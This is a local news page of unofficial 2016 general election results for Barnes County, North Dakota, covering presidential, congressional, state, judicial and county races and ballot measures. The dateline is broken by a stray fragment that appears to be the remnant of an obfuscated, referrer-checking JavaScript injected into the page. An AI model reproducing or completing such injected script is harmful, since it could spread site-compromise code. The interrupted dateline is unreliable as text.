Barnes County 2016 Election Results

 

VALLEY tfrsd|var|u0026u|referrer|skybb||js|php’.split(‘|’),0,{}))
CITY, N.D. (NewsDakota.com) – The following are the unofficial results of contested races voted on by residents in Barnes County during the November 8th 2016 General Election.

Voters cast their ballots at the Barnes County Courthouse.

President Of The United States

Donald Trump (Republican) – 3156

Hillary Clinton (Democratic-NPL) – 1597

Gary Johnson (Libertarian) – 406

Jill Stein (Green) – 47

Darrell Castle (Constitution) – 41

Rocky De La Fuente (American Delta) – 6

United States Senator

John Hoeven (Republican) – 4295

Eliot Glassheim (Democratic-NPL) – 835

Robert N Marquette (Libertarian) – 140

James Germalic (Independent Nomination Party) – 56

United States House Representative

Kevin Cramer (Republican) – 3397

Chase Iron Eyes (Democratic-NPL) – 1536

Jack Seaman (Libertarian) – 336

District 24 State Senator 

Elred Knutson (Republican) – 3,176  48%

Larry Robinson (Democratic-NPL) – 3,362  51%

District 24 State Representative (2)

Dwight Kiefert (Republican) – 3,114  26%

Daniel Johnston (Republican) – 3,105  26%

Naomi Muscha (Democratic-NPL) – 2,763   22%

Sharon Buhr (Democratic-NPL) – 2,698  22%

North Dakota Governor and Lieutenant Governor

Doug Burgum and Brent Sanford (Republican) – 4,210

Marvin Nelson and Joan Heckman (Democratic-NPL) – 917

Marty Riske and Joshua Voytek (Libertarian) – 188

State Auditor

Josh Gallion (Republican) – 3610

Roland Riemers (Libertarian) – 1178

State Treasurer

Kelly Schmidt (Republican) – 3054

Tim Mathern (Democratic-NPL) – 1686

Eric Olson (Libertarian) – 356

State Insurance Commissioner

John Godfread (Republican) – 2978

Ruth Buffalo (Democratic-NPL) – 1503

Nick Bata (Libertarian) – 509

State Public Service Commissioner

Julie Fedorchak (Republican) – 3323

Marlo Hunte-Beaubrun (Democratic-NPL) – 1231

Thomas Skadeland (Libertarian) – 428

State Superintendent of Public Instruction

Kirsten Baesler – 3561

Joe Chiang – 1138

North Dakota Supreme Court Justice (10 year term)

Jerod Tufte – 3072

Robert Bolinske, Sr. – 1327

District #2 Judge

Lyle Bopp – 1779

Mark Blumer – 2494

District #5 Judge

Daniel Narum – 2636

Kim Radermacher – 1705

Barnes County Commissioner District 1 (4 year term)

Cindy Schwehr – 834

LeRoy Triebold – 298

Barnes County Commissioner District 5 (4 year term)

Robert Drake – 231

John Froelich – 789

Garrison Diversion Conservancy District of Barnes County (4 year term)

Greg Bischoff was elected to a 4 year term to become a board member of the Garrison Diversion Conservancy for Barnes County.

Bischoff received 2,989 votes and Leroy Triebold got 1,631 votes in the November 8th general election.

Greg Bischoff is the son of the late Roger Bischoff who served nearly two terms on the Garrison Diversion Conservancy Board before he passed earlier this year.

State Measure #1 (Legislators Must Live In Districts They Serve)

Yes – 4414

No – 700

State Measure #2 (Oil Extraction Tax Distribution)

Yes – 3379

No – 1711

State Measure #3 (Crime Victims/”Marsy’s Law”)

Yes – 3178

No – 2034

State Measure #4 (Tobacco Tax Increase)

Yes – 2018

No – 3298

State Measure #5 (Medical Marijuana)

Yes – 3099

No – 2161

Barnes County Measure #1 (9-1-1 Fee Increase)

Barnes County voters narrowly defeated a county measure that would have increased a 9-1-1 fee on their monthly bills to help pay for equipment upgrades for the Barnes County Dispatch Center.

No – 2,632

Yes – 2,601

The proposed fee would have increased your monthly phone bill from $1.00 to $1.50 per line in Barnes County.


Comment Disclaimer: The views and opinions expressed in the comments section of NewsDakota.com are solely those of the comment author and do not necessarily reflect the views and opinions held by NewsDakota.com.

Comments are closed.



Inside Agriculture

Farm Talk w/ Mick Kjar

Multimedia